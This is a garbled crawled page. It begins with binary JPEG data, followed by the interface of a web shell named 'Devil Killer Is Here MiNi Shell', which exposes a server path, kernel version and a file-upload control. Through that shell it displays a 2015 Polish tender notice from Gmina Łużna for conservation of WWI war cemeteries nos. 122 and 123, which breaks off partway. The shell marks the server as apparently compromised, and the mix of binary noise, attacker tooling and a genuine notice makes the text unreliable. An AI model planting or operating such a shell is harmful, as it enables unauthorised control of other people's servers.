JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150717/106727-N-2015.html

<p class="kh_header"><b>Łużna: Remont cmentarzy wojennych nr 122 oraz  123 w Łużnej -Pustkach</b><br>
<b>Numer ogłoszenia: 106727 - 2015; data zamieszczenia: 17.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łużna , Łużna 634, 38-322 Łużna, woj. małopolskie, tel. 018 3543922, faks 018 3543039.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont cmentarzy wojennych nr 122 oraz  123 w Łużnej -Pustkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: Remont cmentarzy wojennych nr 122 oraz 123 w Łużnej - Pustkach wykonany z materiałów własnych Wykonawcy.
2.W zakres przedmiotu zamówienia wchodzi wykonanie następujących zadań:
1) Zadanie Nr 1 Konserwacja kamiennych elementów cmentarza wojennego Nr 123 na wzgórzu Pustki w Łużnej wpisanego do rejestru zabytków pod Nr A - 563/88 - zakończenie - polegająca na:
a) zakończeniu konserwacji  kamiennych pomników - 14  szt.,
b) zakończeniu konserwacji kamiennych tarasów widokowych - 3 szt.,
c) zakończeniu konserwacji pomnika węgierskiego o formie obelisku,
d) zakończeniu konserwacji płyty nagrobnej Michała Stępienia,
e) montażu 44 szt. emaliowanych tabliczek na krzyżach na kwaterze żołnierzy niemieckich- część dolna, 
f) impregnacji balustrady tarasu gontyny (kamień na koronie tarasu, słupki i wypełnienie balustrady, nakrywa),
g) impregnacji kamiennej okładziny gontyny.
2) Powyższe zadanie należy wykonać zgodnie z:
a)  formularzem cenowym prac konserwatorskich (zał. Nr 8 do SIWZ),
b) warunkami określonymi przez Małopolskiego Wojewódzkiego Konserwatora Zabytków w Pozwoleniu Nr 200/2013 z dnia 15 października 2013 roku (zał. Nr 9 do SIWZ) oraz Decyzją 18/2014 z dnia 15 maja 2014 roku Małopolskiego Wojewódzkiego Konserwatora Zbytków zmieniająca treść Pozwolenia Nr 200/2013 z 15.10.2013 roku (zał. Nr 10 do SIWZ),,
c) Programem Prac Konserwatorskich dla cmentarza wojskowego z czasów I wojny światowej Nr 123 na wzgórzu Pustki w Łużnej autorstwa mgr Marka Sawickiego - dotyczy prac wymienionych w poz. a, b, (zał. Nr 11 do SIWZ),
d) Aneksem do Programu Prac Konserwatorskich dla cmentarza wojennego z czasów I wojny światowej Nr 123 na wzgórzu Pustki w Łużnej obejmującego trzy pomniki trójkątne, płytę nagrobną Michała Stępnia i kamienno-drewniany pomnik węgierski autorstwa mgr Marka Sawickiego - dotyczy prac wymienionych w cz. poz. a oraz poz. c, d, ( zał. Nr 12 do SIWZ),
e) Dokumentacją historyczno-odtworzeniową wnętrza cmentarza autorstwa Pana Jerzego Drogomira - dotyczy prac wymienionych w poz e (zał. Nr 13 do SIWZ). 

3) Zadanie Nr 2 Remont ogrodzenia cmentarza wojennego z I wojny światowej Nr 122 w Łużnej - I etap wpisanym do rejestru zabytków pod Nr Ks.A - 686, dec. z dn.20.11.1992 r. - zakres zadania obejmuje prace remontowo-odtworzeniowe kamiennego muru ogrodzeniowego cmentarza wojennego z I wojny światowej nr 122 w Łużnej, a w tym: 
a) Demontaż muru i jego odtworzenie na odcinku na którym nastąpiło nieodwracalne wychylenie tego muru. Na odcinku gdzie uszkodzenie polega na odspojeniu i odpadnięciu warstwy licowej należy podjąć próbę zabezpieczenia obejmującego wzmocnienie posadowienia, ochronę przed zjawiskiem wysadzin i przywrócenie spójności muru w przekroju porzecznym.
b) Zabezpieczenie muru wykazującego pionowe rozspojenie i odpadniecie warstwy licowej spowodowane między innymi skutkami osiadania i wysadzin oraz skutkami korozji atmosferycznej poprzez kotwienie poprzeczne przy pomocy nierdzewnych prętów oraz iniekcje objętościową rozluźnionej struktury rdzenia muru. Realizacja takiego programu zabezpieczeń wymaga sprawdzenia warstwy rdzeniowej pod kątem zawartości siarczanów w składzie zaprawy. Wyniki badań na obecność siarczanów mogą spowodować wymagania co do składu mineralogicznego zaczynu iniekcyjnego.
c) W celu stabilizacji posadowienia muru należy zastosować zbrojoną iniekcje dogęszczającą podłoża gruntowego.
d) Zabezpieczenie nakrywy betonowej przez jej wymianę i odpowiednie uformowanie zgodnie z projektem.
e) W przypadku odcinka muru wykazującego utrwalone wychylenie remont musi być poprzedzony rozbiórką całego przekroju muru łącznie z ławą betonową. Odtworzenie muru w sposób wierny z pierwowzorem należy rozpocząć od wzmocnienia przy pomocy iniekcji zbrojonej z zastosowaniem perforowanych rurek stalowych ocynkowanych d=20,0/3,2 mm. Identyczne wzmocnienie można stosować w przypadku płytszego posadowienia ławy spowodowanego obecnością wody gruntowej. W takim przypadku przy braku zapewnienia głębokości posadowienia chroniącej przed przemarzaniem, należy zastosować ocieplenie podstawy fundamentu płytami z nienasiąkliwego styropianu ekstrudowanego.
f) Należy zapewnić zespolenie odtworzonej części przy pomocy wklejanych prętów nierdzewnych lub przy pomocy prętów kompozytowych z włókna szklanego w osnowie żywicznej. 

4) Wszelkie prace ziemne na przedmiotowym cmentarzu winne być prowadzone przy udziale archeologa, po uzyskaniu  pozwolenia Małopolskiego Wojewódzkiego Konserwatora Zabytków przed rozpoczęciem robót. Uzyskanie pozwolenia należy do obowiązku Wykonawcy.

5) Powyższe zadanie należy wykonać zgodnie z:
a) projektem budowlano-wykonawczym remontu ogrodzenia cmentarza wojennego z I wojny światowej Nr 122 w Łużnej opracowanym przez Pracownię Projektową FORMAT s.c. z siedzibą w Gorlicach (zał. Nr 14 do SIWZ),
b) warunkami określonymi przez Małopolskiego Wojewódzkiego Konserwatora Zabytków w Pozwoleniu Nr 213/2013 z dnia 30 października 2013 roku (zał. Nr 15 do SIWZ), oraz w Pozwoleniu Nr 199/2014 z dnia 04 września 2014 roku (zał. Nr 16 do SIWZ),
c) Programem Prac Konserwatorskich dla cmentarza wojskowego z czasów I wojny światowej Nr 122 w Łużnej autorstwa mgr Marka Sawickiego (zał. Nr 17 do SIWZ),
d) decyzją Nr 761/2013, znak AB.6740.835.2013 z 04 listopada 2013 roku zatwierdzająca projekt budowlany i udzielającą pozwolenia na wykonanie robót budowlanych polegających na Remoncie ogrodzenia cmentarza wojennego z I wojny światowej nr 122 na działce 833/2 położonej w Łużnej wydanej przez Starostę Gorlickiego (zał. Nr 18do SIWZ),
e) dokumentacją pn. Rozwiązania zamienne dotyczące naprawy konstrukcji muru opracowane w nawiązaniu do Opinii do rozwiązań projektowych zabezpieczenia murowanego ogrodzenia cmentarza wojennego z I wojny światowej Nr 122 w Łużnej, woj. małopolskie  z grudnia 2014 roku autorstwa dr inż. Stanisława Karczmarczyka oraz dr inż. Wiesława Bereza (zał. Nr 19 do SIWZ),
e) przedmiarem robót (zał. Nr 20 do SIWZ),
f) warunkami określonymi w Specyfikacji technicznej wykonania i odbioru robót budowlanych (zał. Nr 21 do SIWZ),

3. W sprawach związanych z obustronnym wykonaniem umowy decyzje Małopolskiego Wojewódzkiego Konserwatora Zabytków są wiążące dla Stron.

Jeśli w Programie Prac Konserwatorskich, dokumentacji projektowej i przetargowej zostało wskazane pochodzenie (marka, znak towarowy, producent, dostawca) materiałów lub normy, aprobaty, specyfikacje i systemy, o których mowa w art. 30 ust. 1-3 Ustawy Pzp, Zamawiający dopuszcza oferowanie materiałów lub rozwiązań równoważnych  pod warunkiem osiągnięcia założonych parametrów technicznych co najmniej takich jak wskazane w Programie Prac Konserwatorskich. Wszędzie gdzie w opisach występują nazwy materiałów można zastosować inne materiały o parametrach technicznych i fizycznych równoważnych do przedstawionych w dokumentacji przetargowej. 
Zgodnie z art. 30 ust. 5 Ustawy Pzp.Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez zamawiającego.

4. Zaleca się, aby Wykonawca dokonał wizji lokalnej terenu oraz uzyskał 
na swoją odpowiedzialność i ryzyko wszelkie istotne informacje niezbędne do przygotowania oferty. Wizja lokalna winna być dokonana na koszt własny wykonawcy.
5.  Szczegółowe warunki realizacji zamówienia zawarte zostały we wzorze umowy, który stanowi załącznik nr 7 do siwz.
6.Termin realizacji przedmiotu umowy: od dnia podpisania umowy do:
1) zadanie Nr 1 do dnia 15 października 2015 roku,
2) zadanie Nr 2 do dnia  24 września 2015 roku
3) za termin zakończenia realizacji przedmiotu umowy uznaje się dzień podpisania protokołu odbioru końcowego robót, termin ten jest rozumiany jako ostateczne wykonanie przedmiotu zamówienia, potwierdzone protokołem odbioru przedmiotu zamówienia.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 92.52.21.00-7, 45.11.12.20-6, 45.11.11.00-9, 45.11.13.00-1, 45.26.23.00-4, 45.26.25.00-6, 45.26.25.10-9, 45.45.20.00-0, 45.45.30.00-7, 45.40.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości 9 000,00 zł (słownie; dziewięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku przez złożenie oświadczenia (według wzoru stanowiącego załącznik nr 2 do Specyfikacji)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca ubiegający się o zamówienie,  wykonał w okresie  ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie; 
1. co najmniej dwa zamówienia (umowy) na podobne roboty budowlane, tj. wykonanie  robót budowlano - konserwatorskich  w obiektach grobownictwa wojennego wpisanych do rejestru zabytków, o wartości brutto pojedynczego zamówienia co najmniej 250 000,00 zł
2.	co najmniej dwa zamówienia (umowy) dotyczące wykonania mikropali iniekcyjnych zbrojonych w obiektach wpisanych do rejestru zabytków o wartości każdego z nich minimum 100.000,00 zł brutto

Spełnienie warunku należy udokumentować poprzez : 
- wypełnienie załącznika nr 1 do Specyfikacji  - wykaz robót budowlanych;
- załączenie do wykazu dowodów dotyczących najważniejszych robót wskazanych w wykazie, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Dowodami potwierdzającymi, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone są :
a) poświadczenie,
b) inne dokumenty - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt a).

W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane wskazane w wykazie, zostały wcześniej wykonane, wykonawca nie ma obowiązku przedkładania dowodów, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Ocena spełniania warunku udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia, na podstawie dokumentów załączonych do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku przez złożenie oświadczenia (według wzoru stanowiącego załącznik nr 2 do Specyfikacji)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować osobami zdolnymi do wykonania zamówienia lub przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. 
Spełnienie warunku  będzie rozumiane jako dysponowanie co najmniej :
a)	kierownikiem robót posiadającym uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie  w specjalności konstrukcyjno-budowlanej, określone przepisami Prawa budowlanego;  posiadającym doświadczenie -  minimum 5 lat - w kierowaniu robotami budowlanymi, w tym co najmniej 2 lata praktyki zawodowej przy obiektach wpisanych do rejestru zabytków, a w okresie ostatnich 5 lat przed upływem terminu składania ofert - kierowanie co najmniej 2 remontami (dwie umowy) konserwatorskim obiektów wpisanych do rejestru zabytków. 

b)	kierownikiem prac konserwatorskich, odpowiedzialnym za prace konserwatorskie oraz efekt estetyczny całości zamówienia, posiadającym : wykształcenie określone w § 22 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. 2011, nr 165, poz. 987, ze zm.) oraz doświadczenie zawodowe - co najmniej 5 lat - w kierowaniu pracami konserwatorskimi;  

c)	archeologiem, posiadającym wykształcenie określone w § 26  rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 roku w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych (Dz. U. 2011, nr 165, poz. 987, ze zm.) oraz  doświadczenie zawodowe (co najmniej 5-letnie)  w prowadzeniu badań archeologicznych.

Ocenę spełniania warunku udziału w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty wykazu osób wraz z oświadczeniem, że osoby te posiadają wymagane uprawnienia oraz informacją o podstawie do dysponowania tymi osobami (wzór oświadczenia w tym zakresie przedstawia załącznik nr 3 do Specyfikacji) - metodą spełnia/nie spełnia.

W każdym przypadku, gdy wymagane jest posiadanie określonych uprawnień budowlanych  lub konserwatorskich przez osobę wskazywaną do pełnienia jakiejkolwiek funkcji wymienionej powyżej,  Zamawiający dopuszcza posiadanie przez wskazane osoby:
- uprawnień równoważnych względem wymaganych, które zostały wydane na podstawie wcześniej obowiązujących przepisów, lub 
- uprawnień równoważnych względem wymaganych, uznanych przez właściwy organ zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej     (j.t. Dz. U. 2008 r., nr 63, poz. 394),  lub
- uprawnień równoważnych względem wymaganych, nabytych w innym niż Rzeczpospolita Polska państwie członkowskim Unii Europejskiej, państwie członkowskim Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stronie umowy o Europejskim Obszarze Gospodarczym lub Konfederacji Szwajcarskiej i której, na mocy odrębnych przepisów, przysługuje prawo do świadczenia usług transgranicznych na terytorium Rzeczypospolitej Polskiej</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Wykonawca potwierdza spełnienie warunku przez złożenie oświadczenia (według wzoru stanowiącego załącznik nr 2 do Specyfikacji)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Kosztorysy ofertowe.
2.Wypełniony formularz oferty (według wzoru stanowiącego załącznik nr 6 do Specyfikacji).
3.Pisemne zobowiązanie podmiotu(ów) do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
